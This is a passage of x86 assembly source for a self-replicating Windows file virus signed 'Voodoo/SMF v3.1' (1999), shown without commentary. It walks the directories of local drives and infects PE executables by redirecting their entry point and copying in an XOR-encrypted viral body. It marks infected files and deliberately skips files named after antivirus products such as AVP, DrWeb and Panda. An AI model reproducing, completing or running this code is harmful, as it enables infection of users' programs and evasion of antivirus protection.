call FindFirstFileA
mov dword ptr [SearcHandle+ebx],eax
l2: call PushWin32FindData
push edx
push dword ptr [SearcHandle+ebx]
call FindNextFileA
or eax,eax
jz ExitFromProcInfectDir
cmp byte ptr [files+ebx],'.'
je l2
mov eax,[Win32FindData+ebx]
and eax,FILE_ATTRIBUTE_DIRECTORY
jz l2
;set new dir
mov edx,CurDir2
add edx,ebx
push edx
call SetCurrentDirectory
mov edx,files
add edx,ebx
; SYSTEM32 ?
push ebx
mov ebx,edx
call CRCSum
pop ebx
cmp eax,SYSTEM32CRC
je l2 ;DoNotInfect
push edx
call SetCurrentDirectory
call Infect_All_files
jmp l2
ExitFromProcInfectDir:
ret
;----------------------------------------------------------
Infect_All_files:
call PushWin32FindData
push edx
mov edx,@mask
add edx,ebp
push edx
xor ecx,ecx
call FindFirstFileA
mov dword ptr [SearcHandle2+ebx],eax
cmp eax,-1
je l2__
Next: or eax,eax
jz l2__
cmp ecx,FileCount
jge l2__
inc ecx
push ecx
call InfectFile
call PushWin32FindData
push edx
push dword ptr [SearcHandle2+ebx]
call FindNextFileA
pop ecx
cmp di,9999h
jne Noerrror
dec ecx
xor edi,edi
Noerrror:
jmp Next
l2__: ret
;-----------------------------------------------------------
Infect:
mov eax,CurDir
add eax,ebx
push eax ;
push 800
call GetCurrentDirectory
call InfectDir
mov ecx,DiskCount
Scan: push ecx
mov eax,@disk
add eax,ebp
push eax
call SetCurrentDirectory
call InfectDir
inc byte ptr [@disk+ebp]
pop ecx
loop Scan
mov eax,CurDir
add eax,ebx
push eax ;
call SetCurrentDirectory
ret
;----------------------------------------------------------
InfectFile:
mov eax,ebx
add eax,files
cmp word ptr [eax],'-F' ;F-port
je @AV
cmp word ptr [eax],'WA' ; AW ?
je @AV
cmp word ptr [eax],'VA' ; AV?????
je @AV
cmp word ptr [eax+1],'VA' ;NAV,PAV,RAV,_AVP???
je @AV
cmp word ptr [eax+3],'BE' ;drWeb
je @AV
cmp word ptr [eax+2],'DN' ;PANDA
je @AV
cmp dword ptr [eax],'ITNA';ANTI???
je @AV
cmp dword ptr [eax],'FASV';VSAF???
je @AV
cmp dword ptr [eax],'PWSV';VSWP???
je @AV
cmp dword ptr [eax],'VASF';FSAV???
je @AV
push eax
push 00000020h
push eax
call SetFileAttributesA
pop eax
push NULL
push FILE_ATTRIBUTE_ARCHIVE
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ or FILE_SHARE_WRITE
push GENERIC_READ or GENERIC_WRITE
push eax
call CreateFileA
cmp eax,-1
je Error__
call LoadMemPointer
mov [HhendleOfFile+ebx],eax
push ebx
push NULL
push eax
call GetFileSize
pop ebx
mov [FileSize+ebx],eax
Point@ret:push edx
push eax ; to MApViewofFile
push NULL
push eax
push NULL
push PAGE_READWRITE
push NULL
push dword ptr [HhendleOfFile+ebx]
call CreateFileMappingA
mov [HhendleOfMapFile+ebx],eax
; v steke Size
push 0
push 0
push FILE_MAP_WRITE
push eax
call MapViewOfFile
mov [Pointer2MapFile+ebx],eax
pop edx
cmp word ptr [tag+ebx],6666h
je OkOb
mov esi,eax
CMP byte ptr [esi+18h],40h
jl OOO
cmp dword ptr [esi+3ch],00010000h
jg OOO
mov edi,dword ptr [esi+3ch]
cmp dword ptr [esi+edi],00004550h ;PE Only !
jne OOO
cmp dword ptr [esi+6fh],334e4957h ;'WIN3' Infected ?
je OOO
;find CODE object
mov [systemtime+ebx],esi
;
add esi,edi
mov eax,dword ptr [esi+80h] ;Import Table RVA
push eax
xor ecx,ecx
mov cx,word ptr [esi+6h] ;Num of Object
MOV EDX,DWORD ptr [esi+28h] ; Entry point RVA
mov dword ptr [ebp+@EntryPointRVA],edx
mov edx,esi
mov eax,24
add ax,word ptr [esi+14h]
mov edi,esi
add edi,eax ;edi=Object Table
pop eax ;Import Table RVA
pusha
mov edx,eax
Find_Import_Table:
dec ecx
mov eax,dword ptr [edi+0ch] ; Object RVA
cmp edx,eax
jge Mabe
IncEDI: add edi,28h
or ecx,ecx
je Not_Find
jmp Find_Import_Table
Mabe: add eax,dword ptr [edi+10h] ; SIZE
CMP EDX,EAX ; Object RVA =< Import Table RVA =< Object RVA + Phisikal Size
jle L22
jmp IncEDI
L22:
mov esi,[Pointer2MapFile+ebx]
push edx
sub edx,dword ptr [edi+0ch]
add esi,edx
mov eax,dword ptr [edi+14h] ;Phis offset
add esi,eax
pop edx ; ESI = Phis offset Import Table
mov ecx,dword ptr [edi+0ch] ; Object RVA
ECTLI_KERNEL:
mov edi,dword ptr [esi+0ch] ; EDI=Name RVA
cmp edi,NULL ;
je KERNEL_HET
sub edi,ecx
add edi,eax ; EAX= Phis offset
add edi,[Pointer2MapFile+ebx]
cmp dword ptr [edi],'NREK';KERNEL
je KERNEL_ECT
add esi,14h
jmp ECTLI_KERNEL
KERNEL_HET:
Not_Find: popa
jmp Code_Not_Find
KERNEL_ECT: popa
_loop: db 08Bh,47h,24h ;mov eax,dword [edi+024h]
EXEC_FLAG EQU 20000020h
and eax,EXEC_FLAG
jnz Code_Object
add edi,2ch
loop _loop
jmp Code_Not_Find
Code_Object:
;chek object size
cmp dword ptr [edi+10h],VirSize
jl Code_Not_Find
push esi
mov esi,dword ptr [systemtime+ebx]
mov dword ptr [esi+6fh],334e4957h
pop esi
; make writeble
or dword ptr [edi+24h],80000000h
mov eax,dword ptr [edi+0ch] ;object RVA
sub dword ptr [ebp+@EntryPointRVA],eax
mov dword ptr [edx+28h],eax ; Set New Entry Point RVA
; save old Programm
call CloseMapping
mov word ptr [ebx+tag],06666h
mov eax,dword ptr [ebx+FileSize]
push eax
add eax,VirSize
jmp Point@ret
OkOb: mov word ptr [ebx+tag],09999h
mov esi,dword ptr [edi+14h] ;phisical offset
add esi,dword ptr [ebx+Pointer2MapFile]
;add esi,edx
pop edi
add edi,dword ptr [ebx+Pointer2MapFile]
mov ecx,VirSize
push esi ;CODE
push esi
cld
rep movsb
;write bady to program
mov esi,ebp
sub esi,5
pop edi ; CODE
mov ecx,VirSize
cld
rep movsb
mov eax,ebx
add eax,systemtime
push eax
call GetSystemTime
mov ax,word ptr [ebx+systemtime+14]
pop esi
mov byte ptr [esi+6],al
mov byte ptr [esi+CRCcode+1],al ; ?
mov dword ptr [esi+INCAX],0e2c10366h ;inc ax
mov dword ptr [esi+INCAX2],0e2c10366h ;inc ax
push esi
push eax
mov ecx,VirSize- popravka2
add esi,offset CryptBegin2- offset Voodoo_Ver_3_1;
crypt_2: xor byte ptr [esi],al
add ax,cx
inc esi
loop crypt_2
pop eax
POP esi
mov ecx,VirSize- popravka
add esi,offset CryptBegin- offset Voodoo_Ver_3_1;2eh+6
crypt_: xor byte ptr [esi],al
add ax,cx
inc esi
loop crypt_
Code_Not_Find:
OOO2: call CloseMapping
Error__2: call PushWin32FindData
push dword ptr [edx]
mov eax,ebx
add eax,files
push eax
call SetFileAttributesA
@AV: ret
OOO: mov di,9999h
jmp OOO2
Error__: mov di,9999h
jmp Error__2
;--------------------------------------------------------
CalkProcAdress: push ecx
push esi
push edi
mov esi,@Name_Pointers_RVA
add esi,ecx
mov esi,dword ptr [esi]
fCRC: call ScanNameTable
cmp eax,edx
je foCRC
inc esi
inc esi
inc esi
inc esi
jmp fCRC
foCRC:
mov eax,dword ptr [esi]
add eax,ebp
push eax
mov eax,@KernelHandle
add eax,ecx
push dword ptr [eax]
call dword ptr [@GetProcAddress+ecx]
pop edi
pop esi
pop ecx
ret
;--------------------------------------------------------
ScanNameTable:
PUSH EBX
push ecx
mov ebx,ebp
add ebx,dword ptr [esi]
call CRCSum
pop ecx
POP EBX
ret
;--------------------------------------------------------
CRCSum: xor eax,eax
Sum: add eax,dword ptr [ebx]
cmp byte ptr [ebx+4],0
je ExitfromCRCSum
inc ebx
jmp Sum
ExitfromCRCSum:
ret
;--------------------------------------------------------
ScanMZ:
push ecx ; //
and si,1111000000000000b
ScanMZ_:
sub esi,1000h
cmp word ptr [esi],'ZM'
jne ScanMZ_
mov edi,esi
mov ebx,esi
MOV EBP,ESI
push esi
cmp dword ptr [esi+3ch],00010000h
jg NextMZ
add esi,dword ptr [esi+3ch]
cmp dword ptr [esi],004550h
NextMZ:pop esi
jne ScanMZ_
add esi,dword ptr [esi+3ch]
pop ecx
ret
;---Local ----------
CloseMapping:
push edx
push dword ptr [Pointer2MapFile+ebx]
call UnmapViewOfFile
push dword ptr [HhendleOfMapFile+ebx]
call CloseHandle
pop edx
ret
;--------------------------------------------------------
LoadMemPointer:
mov ebx,dword ptr ds:[ebp+@MemPointer]
ret
;----Import---------
GetFileSize: call LoadMemPointer
jmp dword ptr ds:[ebx+_GetFileSize]
CreateFileA: call LoadMemPointer
jmp dword ptr ds:[ebx+_CreateFileA]
CreateFileMappingA:
call LoadMemPointer
jmp dword ptr ds:[ebx+_CreateFileMappingA]
MapViewOfFile:
call LoadMemPointer
jmp dword ptr ds:[ebx+_MapViewOfFile]
UnmapViewOfFile:
call LoadMemPointer
jmp dword ptr ds:[ebx+_UnmapViewOfFile]
FlushViewOfFile:
call LoadMemPointer
jmp dword ptr ds:[ebx+_FlushViewOfFile]
CloseHandle: call LoadMemPointer
jmp dword ptr ds:[ebx+_CloseHandle]
GetCommandLineA:
call LoadMemPointer
jmp dword ptr ds:[ebx+_GetCommandLineA]
lstrcpyA: call LoadMemPointer
jmp dword ptr ds:[ebx+_lstrcpyA]
ReadFile: call LoadMemPointer
jmp dword ptr ds:[ebx+_ReadFile]
SetFilePointer: call LoadMemPointer
jmp dword ptr ds:[ebx+_SetFilePointer]
FindFirstFileA: call LoadMemPointer
jmp dword ptr ds:[ebx+_FindFirstFileA]
FindNextFileA: call LoadMemPointer
jmp dword ptr ds:[ebx+_FindNextFileA]
GetCurrentDirectory:
call LoadMemPointer
jmp dword ptr ds:[ebx+_GetCurrentDirectory]
SetCurrentDirectory:
call LoadMemPointer
jmp dword ptr ds:[ebx+_SetCurrentDirectory]
SetFileAttributesA:
call LoadMemPointer
jmp dword ptr ds:[ebx+_SetFileAttributesA]
SetFileTime:
call LoadMemPointer
jmp dword ptr ds:[ebx+_SetFileTime]
GetSystemTime:
call LoadMemPointer
jmp dword ptr ds:[ebx+_GetSystemTime]
db '(c) Voodoo/SMF v3.1 07.08.1999'
;-------------------
GetProcAddress dd 11223344h
KernelHandle dd 11223344h
Name_Pointers_RVA dd 11223344h
_GlobalAlloc dd 11223344h
_GlobalLock dd 11223344h
MemPointer dd 11223344h
disk db 'c:/',0
Dirmask DB '*.*',0
mask DB '*.EXE',0
ImportCount EQU (offset EndImportTable- offset ImportTable)/4
ImportTable: dd GlobalUnlockCRC
dd GlobalFreeCRC
dd CreateFileACRC
dd CreateFileMappingACRC
dd MapViewOfFileCRC
dd UnmapViewOfFileCRC
dd FlushViewOfFileCRC
dd CloseHandleCRC
dd FindFirstFileACRC
dd FindNextFileACRC
dd SetFileAttributesACRC
dd SetFileTimeCRC
dd GetFileSizeCRC
dd GetCommandLineACRC
dd ReadFileCRC
dd lstrcpyACRC
dd SetFilePointerCRC
dd GetCurrentDirectoryCRC
dd SetCurrentDirectoryCRC
dd GetSystemTimeCRC
dw 6666h
EndImportTable:
Voodoo_Ver_3_0E:
Ends
End Voodoo_Ver_3_1
===== Cut =====